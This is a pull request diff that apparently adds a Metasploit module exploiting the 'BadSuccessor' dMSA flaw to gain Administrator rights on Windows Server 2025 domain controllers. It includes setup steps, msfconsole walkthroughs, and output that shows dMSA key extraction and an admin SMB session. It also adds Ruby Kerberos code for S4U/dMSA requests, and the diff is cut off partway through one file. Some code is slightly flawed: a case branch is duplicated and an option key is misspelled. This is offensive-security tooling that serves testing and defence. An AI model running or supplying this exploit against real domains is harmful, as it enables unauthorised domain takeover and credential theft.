### PR TITLE
Add BadSuccessor dMSA Privilege Escalation in Windows 2025

### DIFF
--- a/documentation/modules/auxiliary/admin/ldap/bad_successor.md
+++ b/documentation/modules/auxiliary/admin/ldap/bad_successor.md
@@ -1,0 +1,240 @@
+## Vulnerable Application
+
+This module exploits 'Bad Successor', which allows operators to elevate privileges on domain controllers
+running at the Windows 2025 forest functional level. Microsoft decided to introduce Delegated Managed Service
+Accounts (dMSA) in this forest level and they came ripe for exploitation.
+
+Normal users can't create dMSA accounts where dMSA accounts are supposed to be created, the Managed Service
+Accounts OU, but if a normal user has write access to any other OU they can then create a dMSA account in
+said OU. After creating the account the user can edit LDAP attributes of the account to indicate that this
+account should inherit privileges from the Administrator user. Once this is complete we can request kerberos
+tickets on behalf of the dMSA account and voilà, you're admin.
+
+The module has two actions, one for creating the dMSA account and setting it up to impersonate a high
+privilege user, and another action for requesting the kerberos tickets needed to use the dMSA account for privilege
+escalation.
+
+## Setup
+- Download the Windows Server 2025 .iso
+- Install a new Windows Server 2025 instance.
+- Rename the computer to `DC1` and hardcode the IP address.
+- Promote the server to a domain controller for a new forest (e.g., `msf.local`).
+- Set the domain functional level to Windows Server 2025.
+- Once the domain controller is set up, create a `KdsRootKey` with an effective time at least 10 hours in the past:
+```powershell
+PS C:\Users\Administrator> Add-KdsRootKey -EffectiveTime (Get-Date).AddHours(-10)
+
+Guid
+----
+6d0d01bb-f6e6-0f0c-7ec8-d65d2cbca174
+```
+- Verify the key has been created and the `EffectiveTime` is in the past successfully with the following command:
+```
+PS C:\Users\Administrator> Get-KdsRootKey
+
+
+AttributeOfWrongFormat :
+KeyValue               : {117, 226, 79, 104...}
+EffectiveTime          : 11/17/2025 7:46:20 AM
+CreationTime           : 11/17/2025 5:46:20 PM
+IsFormatValid          : True
+DomainController       : CN=DC5,OU=Domain Controllers,DC=msf,DC=test
+ServerConfiguration    : Microsoft.KeyDistributionService.Cmdlets.KdsServerConfiguration
+KeyId                  : 6d0d01bb-f6e6-0f0c-7ec8-d65d2cbca174
+VersionNumber          : 1
+```
+- Create an Organizational Unit (OU) to contain the dMSA accounts:
+```powershell
+New-ADOrganizationalUnit -Name "testing" -Path "DC=msf,DC=local"
+```
+- Open Active Directory Users and Computers (ADUC) and delegate CreateAllChild permissions on the newly created OU to a low-privilege user.
+- Select the new OU, right-click, and choose Properties
+- Select the Security tab and click Advanced
+- Click Add, then click Select a principal
+- Enter the low-privilege user's name and click OK
+- In the Permissions window, check the box for Create all child objects and click OK
+- Ensure Type is set to "Allow"
+- Ensure Applies to is set to "This object and all descendant objects" - important
+- Click OK to apply the changes and close all dialog boxes.
+- The low-privilege user should now have the necessary permissions to create dMSA accounts in the specified OU and edit
+its attributes in order to be vulnerable to Bad Successor.
+- Run the following command to ensure the domain controller has not had any hardening applied that might prevent BadSuccessor for being exploited:
+```powershell
+(Get-ADObject ("CN=Directory Service,CN=Windows NT,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Properties dSHeuristics).dSHeuristics
+```
+- If the output is blank, that means dSHeuristics is set to the default and the domain controller is vulnerable.
+- If the output contains a value ensure that the 28th character is not set to '1' (e.g., `00000000010000000002000000000`)
+- For testing purposes, if it is set to '1', you can set it to a vulnerable value with admin privileges and the following command:
+```powershell
+Set-ADObject ("CN=Directory Service,CN=Windows NT,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -replace @{dSHeuristics='00000000010000000002000000001'}
+```
+
+## Actions
+
+There are two kind of actions the module can run:
+
+1. **CREATE_DMSA** - Creates a dMSA account vulnerable to BadSuccessor. [Default]
+2. **GET_TICKET** - Issues a kerberos ticket for the created dMSA account to gain elevated privileges.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Create a dMSA account and set it to impersonate Administrator:
+1. Do: `use admin/ldap/bad_successor`
+1. Do: `set ACTION CREATE_DMSA`
+1. Do: `set RHOSTNAME <domain controller FQDN>`
+1. Do: `set DMSA_ACCOUNT_NAME <dMSA account name>`
+1. Do: `set ACCOUNT_TO_IMPERSONATE Administrator`
+1. Do: `set LDAPDomain <domain name>`
+1. Do: `set LDAPUsername <username>`
+1. Do: `set LDAPPassword <password>`
+1. Do: `set rhost <domain controller IP>`
+1. Do: `run`
+1. Use the created dMSA account to get elevated kerberos tickets:
+1. Do: `set ACTION GET_TICKET`
+1. Do: `set SERVICE cifs`
+1. With all the other options the same as before, do: `run`
+
+## Options
+
+### DMSA_ACCOUNT_NAME
+
+The name of the dMSA account to be created.
+
+### ACCOUNT_TO_IMPERSONATE
+
+The name of the account to impersonate using the dMSA.
+
+### DC_FQDN
+
+The fully qualified domain name (FQDN) of the domain controller.
+
+## Scenarios
+
+### Action: CREATE_DMSA
+#### Create dMSA on a Windows 2025 Domain Controller
+```
+msf auxiliary(admin/ldap/bad_successor) > set RHOSTNAME dc5.msf.test
+RHOSTNAME => dc5.msf.test
+msf auxiliary(admin/ldap/bad_successor) > set DMSA_ACCOUNT_NAME attacker_dMSA
+DMSA_ACCOUNT_NAME => attacker_dMSA
+msf auxiliary(admin/ldap/bad_successor) > set LDAPDomain msf.test
+LDAPDomain => msf.test
+msf auxiliary(admin/ldap/bad_successor) > set LDAPPassword N0tpassword!
+LDAPPassword => N0tpassword!
+smsf auxiliary(admin/ldap/bad_successor) > set LDAPUsername msfuser
+LDAPUsername => msfuser
+msf auxiliary(admin/ldap/bad_successor) > set rhost 172.16.199.209
+rhost => 172.16.199.209
+msf auxiliary(admin/ldap/bad_successor) > run
+[*] Discovering base DN automatically
+[+] Found 3 OUs we can write to, listing them below:
+[+]  - OU=Domain Controllers,DC=msf,DC=test
+[+]  - OU=BadBois,DC=msf,DC=test
+[+]  - OU=dMSA_Accounts,DC=msf,DC=test
+[*] Attempting to create dmsa account cn: attacker_dMSA, dn: CN=attacker_dMSA,OU=dMSA_Accounts,DC=msf,DC=test
+[+] Created dmsa attacker_dMSA
+[*] Setting attributes for dMSA object: CN=attacker_dMSA,OU=dMSA_Accounts,DC=msf,DC=test
+[+] Successfully updated attributes for dMSA object: CN=attacker_dMSA,OU=dMSA_Accounts,DC=msf,DC=test
+[*] msds-delegatedmsastate => ["2"]
+[*] msds-managedaccountprecededbylink => ["CN=Administrator,CN=Users,DC=msf,DC=test"]
+[*] Auxiliary module execution completed
+```
+
+### Action: GET_TICKET
+#### Elevate privileges using the created dMSA
+```
+msf auxiliary(admin/ldap/bad_successor) > set RHOSTNAME dc5.msf.test
+RHOSTNAME => dc5.msf.test
+msf auxiliary(admin/ldap/bad_successor) > set DMSA_ACCOUNT_NAME attacker_dMSA
+DMSA_ACCOUNT_NAME => attacker_dMSA
+msf auxiliary(admin/ldap/bad_successor) > set LDAPDomain msf.test
+LDAPDomain => msf.test
+msf auxiliary(admin/ldap/bad_successor) > set LDAPPassword N0tpassword!
+LDAPPassword => N0tpassword!
+smsf auxiliary(admin/ldap/bad_successor) > set LDAPUsername msfuser
+LDAPUsername => msfuser
+msf auxiliary(admin/ldap/bad_successor) > set rhost 172.16.199.209
+rhost => 172.16.199.209
+msf auxiliary(admin/ldap/bad_successor) > run
+[*] Running module against 172.16.199.209
+[*] Loading admin/kerberos/get_ticket
+[*] 172.16.199.209:88 - Getting TGT for msfuser@msf.test
+[+] 172.16.199.209:88 - Received a valid TGT-Response
+[*] 172.16.199.209:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20251119215739_default_172.16.199.209_mit.kerberos.cca_626542.bin
+[+] Obtained TGT for the user msfuser
+[*] Using cached credential for krbtgt/MSF.TEST@MSF.TEST msfuser@MSF.TEST
+[*] 172.16.199.209:88 - Getting TGS impersonating attacker_dMSA$@msf.test (SPN: krbtgt/msf.test)
+[+] 172.16.199.209:88 - Received a valid TGS-Response
+[*] 172.16.199.209:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20251119215741_default_172.16.199.209_mit.kerberos.cca_263687.bin
+[*] dMSA Key Package:
+[*]   Current Keys:
+[+]     Type: AES256, Key: c1085cb36ef8c1e7d62693ba4e3402523c8a4c300591ac2fdd1643d0cd80e6ad
+[+]     Type: AES128, Key: ce576bbe6386f5aaee691192ecf0684a
+[+]     Type: RC4, Key: 9857452d6e592835e9b4ef337c1be5c8
+[*]   Previous Keys:
+[+]     Type: RC4, Key: 4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] Obtained TGT for dMSA attacker_dMSA
+[*] Using cached credential for krbtgt/MSF.TEST@MSF.TEST attacker_dMSA$@msf.test
+[*] 172.16.199.209:88 - Getting TGS for attacker_dMSA$@msf.test (SPN: cifs/dc5.msf.test)
+[+] 172.16.199.209:88 - Received a valid TGS-Response
+[*] 172.16.199.209:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20251119215742_default_172.16.199.209_mit.kerberos.cca_858140.bin
+[+] 172.16.199.209:88 - Received a valid delegation TGS-Response
+[+] Obtained elevated TGT for attacker_dMSA
+[*] Auxiliary module execution completed
+```
+
+### Use ticket to connect to the ADMIN$ SMB share
+```
+msf auxiliary(scanner/smb/smb_login) > set username attacker_dMSA$
+username => attacker_dMSA$
+msf auxiliary(scanner/smb/smb_login) > set rhost 172.16.199.209
+rhost => 172.16.199.209
+msf auxiliary(scanner/smb/smb_login) > set domaincontrollerrhost 172.16.199.209
+domaincontrollerrhost => 172.16.199.209
+msf auxiliary(scanner/smb/smb_login) > set SMB::Rhostname dc5.msf.test
+SMB::Rhostname => dc5.msf.test
+msf auxiliary(scanner/smb/smb_login) > set SMB::Auth kerberos
+SMB::Auth => kerberos
+msf auxiliary(scanner/smb/smb_login) > set SMB::Krb5Ccname
+SMB::Krb5Ccname =>
+msf auxiliary(scanner/smb/smb_login) > set SMB::Krb5Ccname /Users/jheysel/.msf4/loot/20251119215742_default_172.16.199.209_mit.kerberos.cca_858140.bin
+SMB::Krb5Ccname => /Users/jheysel/.msf4/loot/20251119215742_default_172.16.199.209_mit.kerberos.cca_858140.bin
+msf auxiliary(scanner/smb/smb_login) > run
+[*] 172.16.199.209:445    - 172.16.199.209:445 - Starting SMB login bruteforce
+[*] 172.16.199.209:445    - Loaded a credential from ticket file: /Users/jheysel/.msf4/loot/20251119215742_default_172.16.199.209_mit.kerberos.cca_858140.bin
+[+] 172.16.199.209:445    - 172.16.199.209:445 - Success: 'msf.test\attacker_dMSA$:' Administrator
+[*] SMB session 3 opened (172.16.199.1:33643 -> 172.16.199.209:445) at 2025-11-19 22:23:14 -0800
+[*] 172.16.199.209:445    - Scanned 1 of 1 hosts (100% complete)
+[*] 172.16.199.209:445    - Bruteforce completed, 1 credential was successful.
+[*] 172.16.199.209:445    - 1 SMB session was opened successfully.
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/smb/smb_login) > sessions -i
+
+Active sessions
+===============
+
+  Id  Name  Type  Information                              Connection
+  --  ----  ----  -----------                              ----------
+  3         smb   SMB attacker_dMSA$ @ 172.16.199.209:445  172.16.199.1:33643 -> 172.16.199.209:445 (172.16.199.209)
+
+msf auxiliary(scanner/smb/smb_login) > sessions -i -1
+[*] Starting interaction with 3...
+
+SMB (172.16.199.209) > shares
+Shares
+======
+
+    #  Name      Type          comment
+    -  ----      ----          -------
+    0  ADMIN$    DISK|SPECIAL  Remote Admin
+    1  C$        DISK|SPECIAL  Default share
+    2  IPC$      IPC|SPECIAL   Remote IPC
+    3  NETLOGON  DISK          Logon server share
+    4  SYSVOL    DISK          Logon server share
+    
+SMB (172.16.199.209) > shares -i ADMIN$
+[+] Successfully connected to ADMIN$
+SMB (172.16.199.209\ADMIN$) > pwd
+Current directory is \\172.16.199.209\ADMIN$\
+```

--- a/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
@@ -14,8 +14,9 @@ module Msf
             # @option opts [Rex::Proto::Kerberos::Model::EncryptedData] :enc_auth_data
             # @option opts [Rex::Proto::Kerberos::Model::EncryptionKey] :subkey
             # @option opts [Rex::Proto::Kerberos::Model::Checksum] :checksum
-            # @option opts [Rex::Proto::Kerberos::Model::Authenticator] :auhtenticator
+            # @option opts [Rex::Proto::Kerberos::Model::Authenticator] :authenticator
             # @option opts [Array<Rex::Proto::Kerberos::Model::PreAuthDataEntry>] :pa_data
+            # @option opts [String] :impersonate_type
             # @return [Rex::Proto::Kerberos::Model::KdcRequest]
             # @raise [RuntimeError] if ticket isn't available
             # @see Rex::Proto::Kerberos::Model::AuthorizationData
@@ -70,6 +71,35 @@ module Msf
 
               pa_data = []
               pa_data.push(pa_ap_req)
+              if opts.key?(:impersonate_type) && opts.fetch(:impersonate_type) == 'dmsa'
+                x509_user = Rex::Proto::Kerberos::Model::PreAuthS4uX509User.new(opts[:session_key], opts[:impersonate], opts[:impersonate_type], realm, opts[:nonce])
+
+                pa_data_x509_user = Rex::Proto::Kerberos::Model::PreAuthDataEntry.new(
+                  type: Rex::Proto::Kerberos::Model::PreAuthType::PA_S4U_X509_USER,
+                  value: x509_user.encode
+                )
+
+                pa_data << pa_data_x509_user
+
+                pa_pac_options_flags = Rex::Proto::Kerberos::Model::PreAuthPacOptionsFlags.from_flags(
+                  [
+                    Rex::Proto::Kerberos::Model::PreAuthPacOptionsFlags::BRANCH_AWARE
+                  ]
+                )
+
+                pa_pac_options = Rex::Proto::Kerberos::Model::PreAuthPacOptions.new(
+                  flags: pa_pac_options_flags
+                )
+
+                pa_pac = Rex::Proto::Kerberos::Model::PreAuthDataEntry.new(
+                  type: Rex::Proto::Kerberos::Model::PreAuthType::PA_PAC_OPTIONS,
+                  value: pa_pac_options.encode
+                )
+
+                pa_data << pa_pac
+              end
+
+
               if opts[:pa_data]
                 opts[:pa_data].each { |pa| pa_data.push(pa) }
               end
@@ -330,7 +360,6 @@ module Msf
                 value: pa_for_user.encode
               )
             end
-
           end
         end
       end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -390,8 +390,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   # @option options [Msf::Exploit::Remote::Kerberos::Ticket::Storage::Base] :ticket_storage Override the @ticket_storage attribute
   # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] :credential
   #   The ccache credential from the TGT
-  # @see #authenticate_via_krb5_ccache_credential_tgt Options dcoumentation
-  # @see #get_cached_credential Other options dcoumentation
+  # @see #authenticate_via_krb5_ccache_credential_tgt Options documentation
+  # @see #get_cached_credential Other options documentation
   # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential
   def request_tgs_only(credential, options = {})
     # load a cached TGS
@@ -416,6 +416,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   def s4u2self(credential, options = {})
     realm = self.realm.upcase
     sname = options.fetch(:sname)
+    impersonate_type = options.fetch(:impersonate_Type, 'none')
     client_name = username
 
     now = Time.now.utc
@@ -430,16 +431,22 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     etypes = Set.new([credential.keyblock.enctype.value])
     etypes << Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC
 
+    unless impersonate_type == 'dmsa'
+      pa_data = build_pa_for_user(   {
+                                       username: options[:impersonate],
+                                       session_key: session_key,
+                                       realm: realm
+                                     }
+      )
+    end
+
     tgs_options = {
       ticket_storage: options.fetch(:ticket_storage, @ticket_storage),
       credential_cache_username: options[:impersonate],
-      pa_data: build_pa_for_user(
-        {
-          username: options[:impersonate],
-          session_key: session_key,
-          realm: realm
-        }
-      )
+      pa_data: pa_data,
+      nonce: options[:nonce],
+      impersonate: options[:impersonate],
+      impersonate_type: options[:impersonate_type],
     }
 
     request_service_ticket(
@@ -693,6 +700,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       etype: etypes,
       options: ticket_options,
 
+      impersonate: options[:impersonate],
+      nonce: options[:nonce],
+
       # Specify nil to ensure the KDC uses the current time for the desired starttime of the requested ticket
       from: nil,
       till: expiry_time,
@@ -708,6 +718,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     end
 
     tgs_options = {
+      nonce: options[:nonce],
+      impersonate: options[:impersonate] ,
+      impersonate_type: options[:impersonate_type],
       session_key: session_key,
       subkey: nil,
       checksum: nil,
@@ -719,7 +732,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       body: build_tgs_request_body(**tgs_body_options)
     }
     if options[:pa_data].present?
-      pa_data = [options[:pa_data]] unless options[:pa_data].is_a?(::Enumerable)
+      pa_data = options[:pa_data].is_a?(::Enumerable) ? options[:pa_data] : [options[:pa_data]]
       tgs_options[:pa_data] = pa_data
     end
 
@@ -758,7 +771,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       msg_type: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_SESSION_KEY
     )
 
-    [tgs_ticket, tgs_auth]
+    [tgs_ticket, tgs_auth, ccache.credentials.first]
   end
 
   private
@@ -829,6 +842,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   def authenticate_via_krb5_ccache_credential_tgt(credential, options = {})
     realm = self.realm.upcase
     sname = options.fetch(:sname)
+    nonce = options.fetch(:nonce)
     client_name = username
 
     now = Time.now.utc
@@ -843,10 +857,11 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     etypes = Set.new([credential.keyblock.enctype.value])
     tgs_options = {
       pa_data: [],
-      ticket_storage: ticket_storage
+      ticket_storage: ticket_storage,
+      nonce: nonce
     }
 
-    tgs_ticket, tgs_auth = request_service_ticket(
+    tgs_ticket, tgs_auth, credential = request_service_ticket(
       session_key,
       ticket,
       realm,
@@ -867,8 +882,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       do_delegation = tgs_auth.flags.include?(Rex::Proto::Kerberos::Model::KdcOptionFlags::OK_AS_DELEGATE)
     end
 
+    delegated_tgs_ticket = nil
     if do_delegation
-      delegated_tgs_ticket, delegated_tgs_auth = request_delegation_ticket(
+      delegated_tgs_ticket, delegated_tgs_auth, credential = request_delegation_ticket(
         session_key,
         ticket,
         realm,
@@ -912,7 +928,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     {
       service_ap_request: service_ap_request,
       session_key: tgs_auth.key,
-      client_sequence_number: sequence_number
+      client_sequence_number: sequence_number,
+      credential: credential
     }
   end
 
@@ -1036,7 +1053,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       msg_type: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_SESSION_KEY
     )
 
-    [delegated_tgs_ticket, delegated_tgs_auth]
+    ccache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses(delegated_tgs_res, delegated_tgs_auth)
+
+    [delegated_tgs_ticket, delegated_tgs_auth, ccache.credentials.first]
   end
 
   # Search the database for a credential object that can be used for authentication.

--- a/lib/msf/core/exploit/remote/ldap/active_directory.rb
+++ b/lib/msf/core/exploit/remote/ldap/active_directory.rb
@@ -229,6 +229,7 @@ module Msf
 
         ldap_entry_cache << domain_object
         domain_sid = Rex::Proto::MsDtyp::MsDtypSid.read(domain_object[:objectSid].first)
+        domain_behavior_version = domain_object['msds-behavior-version'].first
 
         root_dse = ldap.search(
           base: '',
@@ -247,6 +248,7 @@ module Msf
         ldap_entry_cache << xref
 
         {
+          domain_behavior_version: domain_behavior_version.to_i,
           netbios_name: xref[:nETBIOSName].first.to_s,
           dns_name: xref[:dNSRoot].first.to_s,
           sid: domain_sid

--- a/lib/rex/proto/kerberos/credential_cache/krb5_ccache_credential.rb
+++ b/lib/rex/proto/kerberos/credential_cache/krb5_ccache_credential.rb
@@ -28,5 +28,15 @@ module Rex::Proto::Kerberos::CredentialCache
     array               :authdatas, initial_length: :authdata_count, type: :credential_authdata
     data                :ticket
     data                :second_ticket
+
+    # Return a Rex::Proto::Kerberos::CredentialCache::Krb5Ccache instance that wraps this credential object.
+    # @rtype [Rex::Proto::Kerberos::CredentialCache::Krb5Ccache]
+    # @see Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses
+    def to_ccache
+      Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.new(
+        default_principal: client,
+        credentials: [ self ]
+      )
+    end
   end
 end

--- a/lib/rex/proto/kerberos/crypto.rb
+++ b/lib/rex/proto/kerberos/crypto.rb
@@ -32,6 +32,7 @@ module Rex
           GSS_ACCEPTOR_SIGN                              = 23
           GSS_INITIATOR_SEAL                             = 24
           GSS_INITIATOR_SIGN                             = 25
+          PA_S4U_X509_USER                               = 26
         end
 
         module Checksum

--- a/lib/rex/proto/kerberos/model.rb
+++ b/lib/rex/proto/kerberos/model.rb
@@ -49,6 +49,15 @@ module Rex
           NT_SRV_XHST = 4
           # Unique ID
           NT_UID = 5
+
+          NT_ENTERPRISE = 10
+        end
+
+        module PaS4uX509UserOptions
+          CHECK_LOGON_RESTRICTIONS = 0x40000000
+          SIGN_REPLY = 0x20000000
+          NT_AUTH_POLICY_NOT_REQUIRED = 0x10000000
+          UNCONDITIONAL_DELEGATION = 0x08000000
         end
 
         # See:
@@ -65,9 +74,12 @@ module Rex
           PA_ETYPE_INFO2 = 19
           PA_PAC_REQUEST = 128
           PA_FOR_USER = 129
+          PA_S4U_X509_USER = 130
+          KEY_LIST_REP = 162
           PA_SUPPORTED_ETYPES = 165
           PA_PAC_OPTIONS = 167
           KERB_SUPERSEDED_BY_USER = 170
+          DMSA_KEY_PACKAGE = 171
         end
 
         module AuthorizationDataType

--- a/lib/rex/proto/kerberos/model/dmsa_key_package.rb
+++ b/lib/rex/proto/kerberos/model/dmsa_key_package.rb
@@ -1,0 +1,105 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Proto
+    module Kerberos
+      module Model
+        # This class provides a representation of a Kerberos KERB-DMSA-KEY-PACKAGE
+        # message as defined in [MS-KILE 2.2.13](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/79170b21-ad15-4a1b-99c4-84b3992d9e70).
+        class DmsaKeyPackage < Element
+          attr_accessor :current_keys
+          attr_accessor :previous_keys
+          attr_accessor :expiration_interval
+          attr_accessor :fetch_interval
+
+          def decode(input)
+            case input
+            when String
+              decode_string(input)
+            when OpenSSL::ASN1::Sequence
+              decode_asn1(input)
+            else
+              raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode DmsaKeyPackage, invalid input'
+            end
+
+            self
+          end
+
+          def encode
+            current_keys_asn1 = OpenSSL::ASN1::ASN1Data.new(encode_keys(current_keys), 0, :CONTEXT_SPECIFIC)
+            previous_keys_asn1 = previous_keys ? OpenSSL::ASN1::ASN1Data.new(encode_keys(previous_keys), 1, :CONTEXT_SPECIFIC) : nil
+            expiration_interval_asn1 = OpenSSL::ASN1::ASN1Data.new([encode_time(expiration_interval)], 2, :CONTEXT_SPECIFIC)
+            fetch_interval_asn1 = OpenSSL::ASN1::ASN1Data.new([encode_time(fetch_interval)], 4, :CONTEXT_SPECIFIC)
+
+            seq = OpenSSL::ASN1::Sequence.new([current_keys_asn1, previous_keys_asn1, expiration_interval_asn1, fetch_interval_asn1].compact)
+
+            seq.to_der
+          end
+
+          private
+
+          def decode_string(input)
+            asn1 = OpenSSL::ASN1.decode(input)
+            decode_asn1(asn1)
+          end
+
+          def decode_asn1(input)
+            seq_values = input.value
+            self.current_keys = decode_keys(seq_values[0])
+            self.previous_keys = seq_values[1] ? decode_keys(seq_values[1]) : nil
+            self.expiration_interval = decode_time(seq_values[2])
+            self.fetch_interval = decode_time(seq_values[3])
+          end
+
+          def decode_keys(input)
+            elements = input.is_a?(OpenSSL::ASN1::ASN1Data) ? input.value : input
+            elements.map do |element|
+              if element.is_a?(Array)
+                element.map { |sub_element| decode_type(sub_element) }
+              else
+                decode_type(element)
+              end
+            end
+          end
+
+          def decode_type(element)
+            case element
+            when OpenSSL::ASN1::Integer
+              element.value.to_i
+            when OpenSSL::ASN1::OctetString
+              element.value
+            when OpenSSL::ASN1::Sequence, OpenSSL::ASN1::ASN1Data
+              element.value.map { |sub_element| decode_type(sub_element) }
+            else
+              raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, "Unsupported element type: #{element.class}"
+            end
+          end
+
+          def encode_keys(keys)
+            keys.map(&:encode)
+          end
+
+          def decode_time(input)
+            case input
+            when OpenSSL::ASN1::ASN1Data
+              generalized_time = input.value.first
+              if generalized_time.is_a?(OpenSSL::ASN1::GeneralizedTime)
+                Time.parse(generalized_time.value.to_s)
+              else
+                raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, "Unsupported time element type in ASN1Data: #{generalized_time.class}"
+              end
+            when OpenSSL::ASN1::GeneralizedTime
+              Time.parse(input.value.to_s)
+            else
+              raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, "Unsupported time element type: #{input.class}"
+            end
+          end
+
+          def encode_time(time)
+            time.encode
+          end
+        end
+      end
+    end
+  end
+end

--- a/lib/rex/proto/kerberos/model/kerberos_time.rb
+++ b/lib/rex/proto/kerberos/model/kerberos_time.rb
@@ -1,0 +1,21 @@
+# -*- coding: binary -*-
+module Rex
+  module Proto
+    module Kerberos
+      module Model
+        # This class provides a representation of KerberosTime
+        class KerberosTime
+          def self.decode(input)
+            # Example decoding logic for KerberosTime
+            Time.at(input.to_i)
+          end
+
+          def self.encode(time)
+            # Example encoding logic for KerberosTime
+            OpenSSL::ASN1::Integer.new(time.to_i)
+          end
+        end
+      end
+    end
+  end
+end

--- a/lib/rex/proto/kerberos/model/pre_auth_data_entry.rb
+++ b/lib/rex/proto/kerberos/model/pre_auth_data_entry.rb
@@ -76,9 +76,15 @@ module Rex
             when Rex::Proto::Kerberos::Model::PreAuthType::PA_FOR_USER
               decoded = OpenSSL::ASN1.decode(self.value)
               PreAuthForUser.decode(decoded)
+            when Rex::Proto::Kerberos::Model::PreAuthType::PA_FOR_USER
+              decoded = OpenSSL::ASN1.decode(self.value)
+              PreAuthForUser.decode(decoded)
             when Rex::Proto::Kerberos::Model::PreAuthType::KERB_SUPERSEDED_BY_USER
               decoded = OpenSSL::ASN1.decode(self.value)
               KerbSupersededByUser.decode(decoded)
+            when Rex::Proto::Kerberos::Model::PreAuthType::DMSA_KEY_PACKAGE
+              decoded = OpenSSL::ASN1.decode(self.value)
+              DmsaKeyPackage.decode(decoded)
             else
               # Unknown type - just ignore for now
             end

--- a/lib/rex/proto/kerberos/model/pre_auth_s4u_x509_user.rb
+++ b/lib/rex/proto/kerberos/model/pre_auth_s4u_x509_user.rb
@@ -1,0 +1,99 @@
+# -*- coding: binary -*-
+
+require 'openssl'
+
+module Rex
+  module Proto
+    module Kerberos
+      module Model
+        # This class provides a representation of the PA-S4U-X509-USER structure
+        # as defined in the Kerberos protocol.
+        class PreAuthS4uX509User < Element
+          # @!attribute user_id
+          #   @return [Rex::Proto::Kerberos::Model::S4uUserId] The user ID
+          attr_accessor :user_id
+          # @!attribute checksum
+          #   @return [Rex::Proto::Kerberos::Model::Checksum] The checksum
+          attr_accessor :checksum
+
+          def get_checksum(key, data)
+            checksum_type = Rex::Proto::Kerberos::Crypto::Checksum::SHA1_AES256
+            cksum_key_usage = Rex::Proto::Kerberos::Crypto::KeyUsage::PA_S4U_X509_USER
+            checksummer = Rex::Proto::Kerberos::Crypto::Checksum::from_checksum_type(checksum_type)
+            checksummer.checksum(key, cksum_key_usage, data)
+          end
+
+          # Initializes the PA-S4U-X509-USER structure
+          #
+          # @param key [String] The encryption key
+          # @param impersonate [String] The impersonation principal name
+          # @param impersonate_type [String] The impersonation principal name
+          # @param realm [String] The realm
+          # @param nonce [Integer] The nonce
+          # @param e_type [Symbol] The encryption type
+          def initialize(key, impersonate, impersonate_type, realm, nonce, e_type: Rex::Proto::Kerberos::Crypto::Encryption::AES256)
+            self.user_id = Rex::Proto::Kerberos::Model::S4uUserId.new(impersonate, impersonate_type, realm, nonce)
+            self.checksum = Rex::Proto::Kerberos::Model::Checksum.new(type: Rex::Proto::Kerberos::Crypto::Encryption::DES3_CBC_SHA1, checksum: get_checksum(key.value, user_id.encode))
+          end
+
+          # Encodes the PA-S4U-X509-USER structure into an ASN.1 String
+          #
+          # @return [String]
+          def encode
+            elems = []
+            elems << OpenSSL::ASN1::ASN1Data.new([user_id.encode], 0, :CONTEXT_SPECIFIC)
+            elems << OpenSSL::ASN1::ASN1Data.new([checksum.encode], 1, :CONTEXT_SPECIFIC)
+
+            seq = OpenSSL::ASN1::Sequence.new(elems)
+
+            seq.to_der
+           end
+
+          # Decodes the PA-S4U-X509-USER structure from an input
+          #
+          # @param input [String, OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [self] if decoding succeeds
+          # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if decoding doesn't succeed
+          def decode(input)
+            case input
+            when String
+              decode_string(input)
+            when OpenSSL::ASN1::ASN1Data
+              decode_asn1(input)
+            else
+              raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode PA-S4U-X509-USER, invalid input'
+            end
+
+            self
+          end
+
+          # Decodes the PA-S4U-X509-USER structure from a String
+          #
+          # @param input [String] the input to decode from
+          def decode_string(input)
+            asn1 = OpenSSL::ASN1.decode(input)
+            decode_asn1(asn1)
+          end
+
+          # Decodes the PA-S4U-X509-USER structure from an OpenSSL::ASN1::Sequence
+          #
+          # @param input [OpenSSL::ASN1::Sequence] the input to decode from
+          def decode_asn1(input)
+            seq_values = input.value
+
+            seq_values.each do |val|
+              case val.tag
+              when 0
